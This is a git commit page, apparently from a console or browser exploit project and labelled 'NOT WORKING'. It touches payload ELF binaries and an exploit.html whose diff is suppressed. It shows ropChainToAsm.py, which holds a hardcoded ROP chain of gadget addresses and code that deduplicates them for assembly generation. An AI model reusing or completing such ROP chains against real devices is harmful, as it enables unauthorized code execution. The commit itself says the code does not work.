NOT WORKING

pull/2/head
Winbagility 2 years ago
Parent
Current commit
e5f1d8658c
4 files changed, with 9 insertions and 3 deletions
  1. Binary
      payload/boot.elf
  2. Binary
      payload/boot_.elf
  3. +2
    -2
      payload/exploit.html
  4. +7
    -1
      ropChainToAsm.py

Binary
payload/boot.elf


Binary
payload/boot_.elf


+ 2
- 2
payload/exploit.html
File diff suppressed because it is too large


+ 7
- 1
ropChainToAsm.py

@@ -10,7 +10,13 @@
# ropchain_appendu32(0x01800000)
# in ropchainBuilder.html
ropChain = ['00000000','010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000000', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', 'FFFF3333', '00000000', '0107DD70', '01035FC8', '01800000', '00000000', 'FFFF2222', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010376C0', '00000001', '00000000', '00000000', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '01023F88', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '00000000', '00000000', '00000000', '00000000', '010204C8', '00000000', '00000000', '00000000', '00000000', '00000000', '0107DD70', '010240B0', '01800000', '00000000', 'FFFF3333', '00000000', '01080274', '00000000', '01800000']
ropChainAddresses = ['00000000', '00000001', '010204C8', '01023F88', '010240B0', '01035FC8', '010376C0', '0107DD70', '01080274', '01800000', 'FFFF2222', 'FFFF3333']

#Generate a list of each value used in the ROP chain for optimization purposes
#Cause no need to load the value in multiple times
ropChainAddresses = []
for i in ropChain:
if not i in ropChainAddresses:
ropChainAddresses.append(i)

# Essentially, to avoid reloading the same hardcoded values too many times, load each value to r10 one at a time
# then write it to all the locations it is used for. In some cases it uses r7 or r11 for payload address and size

